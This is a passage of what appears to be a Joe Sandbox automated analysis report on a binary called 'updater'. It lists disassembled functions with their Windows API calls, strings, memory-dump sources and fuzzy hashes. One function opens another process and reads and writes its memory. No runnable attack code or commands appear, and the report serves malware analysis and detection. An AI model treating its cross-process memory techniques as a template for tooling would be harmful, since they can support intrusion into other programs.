Function 00C0CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C0CD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C0CDA7
MessageBeep.USER32(00000000), ref: 00C0CDBF
KillTimer.USER32(?,0000040A), ref: 00C0CDDB
EndDialog.USER32(?,00000001), ref: 00C0CDF5

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: b19acc78c3a3960f397ad8214625fd93d40b917521949789e5125f3be6a5ad4a
Instruction ID: 0d9f92d4f2e9610125b817966dac13065411907c8d24927c4f247ba6a1b0f2de
Opcode Fuzzy Hash: b19acc78c3a3960f397ad8214625fd93d40b917521949789e5125f3be6a5ad4a
Instruction Fuzzy Hash: D701D634540704ABEB205B20DC8EFAA7BB8FB01701F000769FA93A10E1DBF0A954CF80

Function 00BB178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00BB179B
StrokeAndFillPath.GDI32(?,?,00BEBBC9,00000000,?), ref: 00BB17B7
SelectObject.GDI32(?,00000000), ref: 00BB17CA
DeleteObject.GDI32 ref: 00BB17DD
StrokePath.GDI32(?), ref: 00BB17F8

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 721751c46433bd12eeaac2acd2f9af0739031193da9dc17ebc2ebc9f28c8f943
Instruction ID: 5ce59f951d770389f0cba96a8c95335ffaa5854b2e41e068dfa1013fd08f5f79
Opcode Fuzzy Hash: 721751c46433bd12eeaac2acd2f9af0739031193da9dc17ebc2ebc9f28c8f943
Instruction Fuzzy Hash: E2F0193000824CEBDB255F2AEC4CBAD3BA4FB02322F588354E92DA51F1CB704995DF51

Function 00BBE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00BD0FE6: std::exception::exception.LIBCMT ref: 00BD101C
Part of subcall function 00BD0FE6: __CxxThrowException@8.LIBCMT ref: 00BD1031

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Part of subcall function 00BC1680: _memmove.LIBCMT ref: 00BC16DB

__swprintf.LIBCMT ref: 00BBE598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BBE431

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 9d5e5c2e59c8cf6e6642745e9dd2d1ee8304ecbaddefba39ad6059c1f39237cd
Instruction ID: d8c8450308b8ed87badd3202ef095e32767807167812249b223917ca8f5eb7db
Opcode Fuzzy Hash: 9d5e5c2e59c8cf6e6642745e9dd2d1ee8304ecbaddefba39ad6059c1f39237cd
Instruction Fuzzy Hash: 23918271504201AFC724EF28C895DBEB7E4EF95300F40499EF596972A2EB70ED45CB92

Function 00BD523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00BD52CD

Part of subcall function 00BE0320: __87except.LIBCMT ref: 00BE035B

Strings

pow, xrefs: 00BD52A5, 00BD52C2

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: a4ef75b8939e1a5ce86604a654496767e39b6c818a1cd88d88a9a3516ca2c1a9
Instruction ID: af4cc64da0456075d6633626c248cc660853104eaf74dd10ccca375e229546b3
Opcode Fuzzy Hash: a4ef75b8939e1a5ce86604a654496767e39b6c818a1cd88d88a9a3516ca2c1a9
Instruction Fuzzy Hash: C051806191964187CB217716CA8137EBBF4DB00760F304DEAE4C6463E9FFB48CC89A56

Function 00BD0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00BD0690
#, xrefs: 00BD0699

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: fae41dbeecf5adf5c397995794056df22aa11e7d046592666ec80cc798a5996d
Instruction ID: 7fdffe862f81550f0431bf16a75413e97f0d90a058a59d31ba5ee9ea6d9fb1e7
Opcode Fuzzy Hash: fae41dbeecf5adf5c397995794056df22aa11e7d046592666ec80cc798a5996d
Instruction Fuzzy Hash: F6512475500256CFDB15EF28C484AFABBE4EF56310F148196FCA1AB2D1D730AE92CB60

Function 017B7481 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,017B764B,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 017B74B0

Part of subcall function 017B7149: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 017B7167

Strings

yyyy, xrefs: 017B75A2
eeee, xrefs: 017B75BB
ggg, xrefs: 017B7595

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 121e8d3e99b2d0fa69809bc8c9f5b3312582718b5707418e41c374f70be54b6f
Instruction ID: 206f64594787b11739bc4786444ac9667c3de0bad8c9e1ea0ef7cde195ffdaa4
Opcode Fuzzy Hash: 121e8d3e99b2d0fa69809bc8c9f5b3312582718b5707418e41c374f70be54b6f
Instruction Fuzzy Hash: 3841F2207081464BC71AEEBC88D87FFF7AAEFE4204F644565E442C73D9EB24D9028662

Function 00BCCF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BCCFC2
_memmove.LIBCMT ref: 00BCD060
_memset.LIBCMT ref: 00BCD084

Strings

ERCP, xrefs: 00BCCF2D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: bd8fbaaed790f3ff757b2f81fbc4d330db53db4ab24fa39ab98b3decea696b06
Instruction ID: b3f917d0413bbb08030360c43b008593634a12630e4632cd1f0d1cceaa5e3b71
Opcode Fuzzy Hash: bd8fbaaed790f3ff757b2f81fbc4d330db53db4ab24fa39ab98b3decea696b06
Instruction Fuzzy Hash: F751B4B19007099BDB24CF69C8D1BAABBF4EF04314F1485BEE95ADB291E731D685CB40

Function 00C0A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C11CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C09E4E,?,?,00000034,00000800,?,00000034), ref: 00C11CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C0A3F7

Part of subcall function 00C11C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C09E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00C11CB0

Part of subcall function 00C11BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00C11C08
Part of subcall function 00C11BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C09E12,00000034,?,?,00001004,00000000,00000000), ref: 00C11C18
Part of subcall function 00C11BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C09E12,00000034,?,?,00001004,00000000,00000000), ref: 00C11C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C0A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C0A4B1

Strings

@, xrefs: 00C0A4C9

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 34b93dc1640633ca8c05ece38c6c1ef05b7c36052ff3eca4014e16c50a854a7e
Instruction ID: 76419472fb060d103c41574548676d21d12f6bebe5b70b116419a310448987ee
Opcode Fuzzy Hash: 34b93dc1640633ca8c05ece38c6c1ef05b7c36052ff3eca4014e16c50a854a7e
Instruction Fuzzy Hash: 9A414B7694121CAFCB10DFA4CC85BEEBBB8EB46340F144095FA55B7180DA706E85DBA1

Function 00C379FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C37A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C37A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C37ABE

Strings

SysMonthCal32, xrefs: 00C37A51

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 5fcd66e3abcb05afc6c8401146dddeac1ea1400c045f50a64b7f56e9cb15592a
Instruction ID: a75ed89743dd3a35f50cd8602630d2c20f31b8c782b9500dc7f3eee5b604b4c3
Opcode Fuzzy Hash: 5fcd66e3abcb05afc6c8401146dddeac1ea1400c045f50a64b7f56e9cb15592a
Instruction Fuzzy Hash: 0721A132654219BFDF258F54CC82FEE3BA9EF48724F111214FE156B190DAB1A950EBA0

Function 00C381B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C3826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C3827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C38284

Strings

msctls_updown32, xrefs: 00C381E9

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 943c71445d2e79af8708f4e219a3732afb2310b359858eff1db375273df6d334
Instruction ID: a0281add508b206d7b30379022abdeec1deb5aa9a1535249e1fdf0e09a694177
Opcode Fuzzy Hash: 943c71445d2e79af8708f4e219a3732afb2310b359858eff1db375273df6d334
Instruction Fuzzy Hash: 4C21A1B5610209AFDB10DF54CCC5EAB37EDEB4A394F180159FA1597291CB71EC51CBA0

Function 00C372D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C37360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C37370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C37395

Strings

Listbox, xrefs: 00C3732D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 9343221895019f1e391c5498052d0be7e252523dace0b267c099d8df50bddb2c
Instruction ID: 3633c70fcb5d9f6d1d98fabad37706bde7f202e1b0622146b0e114dac4fd2159
Opcode Fuzzy Hash: 9343221895019f1e391c5498052d0be7e252523dace0b267c099d8df50bddb2c
Instruction Fuzzy Hash: 8A21C272624118BFDF228F54CC85FFF37AAEB89754F118224FE159B1A0C671AC519BA0

Function 017C7825 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,017C8260,0000001C,?,017C78A5,0000001C), ref: 017C7844
GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 017C7851

Strings

VirtualQueryEx, xrefs: 017C784B
kernel32.dll, xrefs: 017C783F

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VirtualQueryEx$kernel32.dll
API String ID: 1646373207-930368515
Opcode ID: 271d0b29fbb461830b5c68b1e97ece0b7e306ce9338ef20c54cb683a82c56c8d
Instruction ID: 3a09fabd064d5e668608fa2935a1a39764df053f1dfb1578feea8aeee6500c76
Opcode Fuzzy Hash: 271d0b29fbb461830b5c68b1e97ece0b7e306ce9338ef20c54cb683a82c56c8d
Instruction Fuzzy Hash: DAE02BB26442057BA704A6B99C06C9FFBACCEC6A70B20431DB66483190DA204D01C670

Function 017C7831 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,017C8260,0000001C,?,017C78A5,0000001C), ref: 017C7844
GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 017C7851

Strings

VirtualQueryEx, xrefs: 017C784B
kernel32.dll, xrefs: 017C783F

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VirtualQueryEx$kernel32.dll
API String ID: 1646373207-930368515
Opcode ID: 7e0c0c7ce2d8fab282c90adc1e8b405717bfe2cef65fc8f0ad4efc6a6abdad23
Instruction ID: 97f7abfb0f797c1b874a9b2815c1516c658211344a7ef6471977041c9ec44d5c
Opcode Fuzzy Hash: 7e0c0c7ce2d8fab282c90adc1e8b405717bfe2cef65fc8f0ad4efc6a6abdad23
Instruction Fuzzy Hash: 16E086B26442087F6708D6D7AC47CABF7EDCDD5FA0310812EF60487200D9705D018AB4

Function 00BC4BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BC4AF7,?), ref: 00BC4BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BC4BCA

Strings

kernel32.dll, xrefs: 00BC4BB3
Wow64RevertWow64FsRedirection, xrefs: 00BC4BC4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: dbe506dccdd7dd8d062ac4895eb1060e636c451368c6745663da4aa903dda24b
Instruction ID: eb72b1c9c1bdfd312b49f73a89bb28614a4b1ced1547e05faec409e82fce2d07
Opcode Fuzzy Hash: dbe506dccdd7dd8d062ac4895eb1060e636c451368c6745663da4aa903dda24b
Instruction Fuzzy Hash: 89D0C7B44A0B128FD3208F30DC08B0A72E4BF01340B208CBED882C2658EBB0C880CA00

Function 00BC4B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BC4B44,?,00BC49D4,?,?,00BC27AF,?,00000001), ref: 00BC4B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BC4B97

Strings

kernel32.dll, xrefs: 00BC4B80
Wow64DisableWow64FsRedirection, xrefs: 00BC4B91

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: e17ad0e68d83cc74b38cd937f336d4d16c04e9680c1e4f4b9e3cfcc962bc5bb0
Instruction ID: 2dff08acd017aac577e828d70fd6dbe1e54eee350ed57297535a0621e8dfdb10
Opcode Fuzzy Hash: e17ad0e68d83cc74b38cd937f336d4d16c04e9680c1e4f4b9e3cfcc962bc5bb0
Instruction Fuzzy Hash: 2FD017B5660B128FD7209F71DC69B0A76E4BF05351F21887ED986E2650E7B0E880CA10

Function 00C31447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00C31696), ref: 00C31455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C31467

Strings

advapi32.dll, xrefs: 00C31450
RegDeleteKeyExW, xrefs: 00C31461

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 1f64b058bb5a517a20e3024a80831ca27e9f76bcd4352b2626c12ac1aa821a0b
Instruction ID: 1535ea3a91dd51331b8ec957affb4956a3a4c7f863608f872d12bde885796de3
Opcode Fuzzy Hash: 1f64b058bb5a517a20e3024a80831ca27e9f76bcd4352b2626c12ac1aa821a0b
Instruction Fuzzy Hash: D3D017755607128FD7209F75C88971A76E4AF07395F25C83A98F6D2160EA70D8C0CA10

Function 00BC55F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BC5E3D), ref: 00BC55FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BC5610

Strings

kernel32.dll, xrefs: 00BC55F9
GetNativeSystemInfo, xrefs: 00BC560A

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 6a91a0c24b1d82c2f865603909b51cbe98096c22fa1d4d77981dd164f1ebe837
Instruction ID: a7c09bfa9a0e906a2177ff8a6b074e6561e94b6153488e01957d919159e8364c
Opcode Fuzzy Hash: 6a91a0c24b1d82c2f865603909b51cbe98096c22fa1d4d77981dd164f1ebe837
Instruction Fuzzy Hash: 7DD017B99A0B128FE7309F31C809B1B76E4BF15355B21887ED986D2291E670D8C0CA50

Function 00C297CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C293DE,?,00C40980), ref: 00C297D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C297EA

Strings

kernel32.dll, xrefs: 00C297D3
GetModuleHandleExW, xrefs: 00C297E4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
